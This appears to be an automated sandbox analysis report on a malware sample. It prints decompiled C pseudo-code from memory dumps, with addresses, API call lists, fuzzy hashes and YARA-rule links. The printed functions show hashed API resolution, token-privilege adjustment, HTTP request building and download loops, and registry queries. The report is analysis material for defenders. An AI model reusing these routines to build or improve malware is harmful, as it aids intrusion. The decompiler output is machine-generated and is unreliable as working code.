0x008447f9
0x008447fc
0x008447fe
0x00844800
0x00844806
0x00844808
0x0084480a
0x00844810
0x0084481d
0x00844838
0x00844838
0x00844810
0x00844844
0x00844844
0x008447b8
0x008447be
0x00000000
0x008447c5
0x008447c5
0x00000000
0x008447c5
0x008447be
0x0084473c
0x00844743
0x00844745
0x0084474d
0x00844845
0x00844753
0x0084475d
0x00844760
0x0084476d
0x00844773
0x0084477c
0x0084477c
0x0084474d
0x00844743

APIs

OffsetRect.USER32 ref: 008446FF
LookupPrivilegeValueW.ADVAPI32(00000000,-00861D33,?), ref: 00844791
EndDialog.USER32 ref: 008447D1
SetTextColor.GDI32(-02D81D33,-045C1D33), ref: 0084481D

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: 2031cd804f65294f11bfeea51d4675f99abc93f801799630f00209b133864daa
Instruction ID: a6a4ed09c076ad620509968c5bb5f38cf36bd87f09fd2b1d4f57753f876a4d54
Opcode Fuzzy Hash: 2031cd804f65294f11bfeea51d4675f99abc93f801799630f00209b133864daa
Instruction Fuzzy Hash: FB412933B0062C57DB18CE58CCE06BF77AAFB99351B16913AE819DB741C270AD46CAC0

Uniqueness

Uniqueness Score: -1.00%

Function 008429D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008429D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -8772043
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -8771171
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -8771994
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x008429d7
0x008429df
0x008429e1
0x008429e5
0x008429f0
0x008429f5
0x00842a01
0x00842a17
0x00842a1f
0x00842a2b
0x00842a2b
0x00842a31
0x00842a34
0x00842a37
0x00842a3d
0x00842a41
0x00842a43
0x00842a43
0x00842a4b
0x00842a51
0x00842a53
0x00842a57
0x00842a59
0x00842a5c
0x00842a62
0x00842a6f
0x00842a81

APIs

DeleteDC.GDI32(-0085DD33), ref: 008429E5
SetWindowPos.USER32(-0085DD33,00847BEC,00000191,00847BEC,00847BEC,00847BEC,00000191), ref: 00842A1F
ResetEvent.KERNEL32(-0085D663,?,00847BEC,-00861FA0,-045C1D33,-00861D33,?,00849287,-00861D33,?,008477A1,00000001,?,-00861D33,?,00846A74), ref: 00842A4B
CreateDIBSection.GDI32(-0085D99A,-0085D99A,-0085D9CB,-0085D663,-0085D9CB,-0085D9CB), ref: 00842A6F

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: a46eed0afa3c001c1e26163a115160701133321648762f7da4d159009e885b58
Instruction ID: ddd59b0688500dfc6287f01d782de4630da5b99ebb80aa02dbae9d0d95254e29
Opcode Fuzzy Hash: a46eed0afa3c001c1e26163a115160701133321648762f7da4d159009e885b58
Instruction Fuzzy Hash: 13110473B002247FD7248A5ADC89EDBBA5EFBC9710B0B1126F849DB150D670AF058AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00907E85, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00907EA9

Part of subcall function 00907CD4: __fltout2.LIBCMT ref: 00907CFE

__cftog_l.LIBCMT ref: 00907ECF
__cftoe_l.LIBCMT ref: 00907F01

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: f6a50f2511539c140e0e63735574315ea7aceff44cf56df945f5abad9aee1d98
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 38014E3280814ABFCF165EC4CC41CEE7F26BB183A4B588455FE18581B1D736E9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 0090993B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00908537: __getptd_noexit.LIBCMT ref: 00908538
Part of subcall function 00908537: __amsg_exit.LIBCMT ref: 00908545

__amsg_exit.LIBCMT ref: 00909967
__lock.LIBCMT ref: 00909977
InterlockedDecrement.KERNEL32(?), ref: 00909994
InterlockedIncrement.KERNEL32(0091F598), ref: 009099BF

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c601c94ccc1359c97e86ca8d040ca8e849265ec31d486ce6e07501e98b0e3987
Instruction ID: 82a147f8dae82504f0b146ef578cc3049d08dda5e4772ba23623ad8b96bee6bc
Opcode Fuzzy Hash: c601c94ccc1359c97e86ca8d040ca8e849265ec31d486ce6e07501e98b0e3987
Instruction Fuzzy Hash: BE01C032B09715EFC720AF649805B9E7364BF48720F004019F828676D2CB34A981DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00908400, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0091CB9C,0091DD60,0000000C,00908512,00000000,00000000,?,009088F8,?,00000001,?,0090B00B,00000018,0091DE68,0000000C,0090B09A), ref: 00908411
InterlockedIncrement.KERNEL32(0091F170), ref: 0090846C
__lock.LIBCMT ref: 00908474
___addlocaleref.LIBCMT ref: 00908493

Memory Dump Source

Source File: 00000004.00000002.2156170350.0000000000866000.00000020.00020000.sdmp, Offset: 00866000, based on PE: false

Similarity

API ID: HandleIncrementInterlockedModule___addlocaleref__lock
String ID:
API String ID: 2801583907-0
Opcode ID: 38ace7baca1910df7de9b24134884104e3259523f0a93e281f3a0b4b0240fb87
Instruction ID: dc7d5e778049e612ee13b2d660f96e34de24250cb38bab421456a3bbacd2e17a
Opcode Fuzzy Hash: 38ace7baca1910df7de9b24134884104e3259523f0a93e281f3a0b4b0240fb87
Instruction Fuzzy Hash: 921130B1A44705DED720DF75D845B9BBBE0EF84314F108929E499D72E1CBB59980CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 1616 Parent PID: 2332 msiexec.exeCOMMON

Executed Functions

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000A9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E0009BF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E0009BF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0009BF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E00099D50(0x647400a5);
						E0009BF50(_t59, _t26, E00099D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E0009BF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E0009BF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E00099D50(0x647400a5);
					_t34 = E0009BF50(_t57, _t32, E00099D50(0x6b5f7e12));
					_t36 = E000955C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000a9ca0
0x000a9cb1
0x000a9cb6
0x000a9cb9
0x000a9cbb
0x000a9cc4
0x000a9cc6
0x000a9cc8
0x000a9d0a
0x000a9d10
0x000a9d1f
0x000a9d29
0x000a9d2e
0x000a9d35
0x000a9d37
0x000a9d39
0x000a9d8e
0x000a9d8e
0x000a9d8e
0x000a9d3b
0x000a9d40
0x000a9d59
0x000a9d5e
0x000a9d70
0x000a9d72
0x000a9d74
0x00000000
0x000a9d76
0x000a9d7d
0x000a9d82
0x000a9d85
0x000a9d87
0x000a9d89
0x000a9d89
0x000a9d74
0x000a9d97
0x000a9da2
0x000a9cca
0x000a9ccf
0x000a9ce8
0x000a9cfa
0x000a9cff
0x000a9d02
0x000a9d04
0x000a9da6
0x000a9da6
0x00000000
0x00000000
0x00000000
0x000a9d04
0x000a9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 20b3f2395e56da2729c00de75a3431a9f906f75f4e13e41830d747d92255f8d0
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: 0C21D3A2E403153AEF2036F46D13FBE35589B52B25F090034FD18B92C3FA91AA1495B3

Uniqueness

Uniqueness Score: -1.00%

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00091AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000AB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E0009BF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000955C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E0009B570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000922E0(_t67, _t51 + _t54 + E00099D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E0009B570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E0009BF50(_t63, 0, E00099D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x00091af9
0x00091afc
0x00091b04
0x00091b14
0x00091b17
0x00091b19
0x00091b1c
0x00091b1e
0x00091b48
0x00091b48
0x00091b48
0x00091b4e
0x00091b5a
0x00091b5f
0x00091b62
0x00091b64
0x00000000
0x00000000
0x00091b6d
0x00091b72
0x00091b75
0x00091b86
0x00091b8a
0x00000000
0x00000000
0x00091b8c
0x00091b8f
0x00091b91
0x00091b97
0x00091b9c
0x00091b9f
0x00091ba1
0x00091bed
0x00091bf0
0x00091bf2
0x00091c03
0x00000000
0x00091c0b
0x00091bf7
0x00091bf9
0x00000000
0x00091bfc
0x00091bba
0x00091bbf
0x00091bc5
0x00000000
0x00000000
0x00091bc7
0x00091bc9
0x00091bcb
0x00091bcd
0x00000000
0x00000000
0x00091bd3
0x00091bd8
0x00091bdb
0x00091be3
0x00000000
0x00091be3
0x00091b20
0x00091b30
0x00091b35
0x00091b3b
0x00091b3d
0x00091b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: 06d5e3289d26b77ad21ae167c27f9fb4c6f363e623e0b8f0153b37d360c3f5fe
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: 2731D8B6E0020B6BDF10DE94EC42FFF77A6AF51715F150025F804A7242F771A915A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009BA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000A5000(_a20, _t60, 0xffffffff);
				E0009BF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E00099D50(0x647400a5);
					E0009BF50(_t61, _t26, E00099D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000955C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E00091460(__eflags, _t39, 4);
							_t34 = E00098290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E0009BF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E0009B570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E0009BF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x0009ba66
0x0009ba70
0x0009ba78
0x0009ba90
0x0009ba95
0x0009baa1
0x0009baa3
0x0009baa8
0x0009baaa
0x0009bab0
0x0009bab3
0x0009babf
0x0009bad8
0x0009badd
0x0009baf1
0x0009baf3
0x0009baf5
0x0009bafe
0x0009bb04
0x0009bb09
0x0009bb0c
0x0009bb0e
0x0009bb10
0x0009bb18
0x0009bb21
0x0009bb26
0x0009bb29
0x0009bb2b
0x00000000
0x0009bb2d
0x0009bb2d
0x0009bb36
0x0009bb3b
0x0009bb4e
0x0009bb50
0x0009bb52
0x0009bb5f
0x0009bb61
0x0009bb54
0x0009bb55
0x0009bb5a
0x00000000
0x0009bb5a
0x0009bb52
0x0009bb2b
0x0009baf7
0x0009baf7
0x0009baf7
0x0009baf7
0x0009bb6b
0x0009bb70
0x0009bb76
0x0009bb76
0x0009bb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 0009BAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BB4E
RegCloseKey.KERNEL32(?), ref: 0009BB76

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: 9a0d17dbb8a912238e8bee2854659a4a7f8f4338881ce0d476bedb172a3c650d
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: EE31B3B29002157BEF109E64AD42FFE3658AB15774F090124FD18A62D3F7B1AA1097F2

Uniqueness

Uniqueness Score: -1.00%

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000ABAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E00093750(_t125, E000920A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000AED80( &_v48, _t126, E0009D0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000AFCF0( &_v48);
				_v32 = 0;
				_t43 = E00099D50(0x647400bf);
				E0009BF50(_t126, _t43, E00099D50(0x6f9f943d));
				_t47 = E0009D0A0( &_v65, 0xb04e6,  &_v65);
				_t90 =  ==  ? 0xb0779 : 0xb07f4;
				_t51 = E0009D0A0( &_v204,  ==  ? 0xb0779 : 0xb07f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000AEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E0009BF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E00099D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E00099D50(0x647400bf);
						_t74 = E0009BF50(_t85, _t72, E00099D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E0009BF50(_t131, 0x13, 0xb157a91);
				_t57 = E0009D0A0( &_v97, 0xb0880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					_t59 = E0009BF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E0009BF50(_t132, 0x13, 0x249c261);
					_t82 = E000955C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E00095920( &_v24, _v20, E00099D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000abad0
0x000abaec
0x000abaf6
0x000abaf8
0x000abb1e
0x000abb2a
0x000abb2d
0x000abb39
0x000abb52
0x000abb65
0x000abb7e
0x000abb89
0x000abb8e
0x000abba3
0x000abba5
0x000abba9
0x000abce1
0x000abce4
0x000abcf5
0x000abcf5
0x000abbaf
0x000abbb2
0x000abbb6
0x000abbb8
0x000abbba
0x000abbc1
0x000abbcf
0x000abbd4
0x000abbdd
0x000abbde
0x000abbdf
0x000abbe1
0x000abbe6
0x000abc00
0x000abc00
0x000abc02
0x000abc0a
0x000abc23
0x000abc28
0x000abc34
0x000abc34
0x000abbe6
0x000abc3d
0x000abc50
0x000abc55
0x000abc60
0x000abc62
0x000abc64
0x000abccd
0x000abcd4
0x000abcdd
0x000abcdf
0x000abcdf
0x000abc66
0x000abc66
0x000abc6d
0x000abc7b
0x000abca5
0x000abcb7
0x000abcbc
0x000abcc1
0x00000000
0x00000000
0x000abcc5
0x000abcc7
0x00000000
0x00000000
0x000abcc9
0x000abcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000ABC60

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Strings

HHb?, xrefs: 000ABB0B

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction ID: b90c88e23c4269f42729eee88e10057647c254401fe32fbebffa8165428e63bf
Opcode Fuzzy Hash: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction Fuzzy Hash: 3651C9B2D402197BEF10AAE0EC52FFF76689B51714F050034FE18A6243FB655A1597F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000A1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E0009BF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000955C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000A8F20(_a4, E00099D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E0009BF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E0009BF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E0009BF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E0009BF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E00099D50(0x647400af);
					_t29 = E0009BF50(_t50, _t27, E00099D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E0009BF50(_t50, 0, E00099D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E0009BF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000a1ea3
0x000a1eab
0x000a1eba
0x000a1ebf
0x000a1ec4
0x000a1ec7
0x000a1ec9
0x000a1faa
0x000a1fbb
0x000a1fc3
0x00000000
0x000a1fc3
0x000a1ed6
0x000a1edf
0x000a1ee8
0x000a1eed
0x000a1ef0
0x000a1efc
0x000a1f00
0x000a1f07
0x000a1f09
0x000a1f0b
0x00000000
0x00000000
0x000a1f14
0x000a1f1d
0x000a1f26
0x000a1f2b
0x000a1f2f
0x000a1f31
0x000a1f33
0x00000000
0x00000000
0x000a1f3a
0x000a1f53
0x000a1f5c
0x000a1f6e
0x000a1f73
0x000a1f73
0x000a1f78
0x000a1f80
0x00000000
0x00000000
0x000a1f88
0x000a1f98
0x000a1f9d
0x000a1fa4
0x000a1fa6
0x000a1fa8
0x00000000
0x000a1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000A1EBA

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000A1F07

Strings

{, xrefs: 000A1F78

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
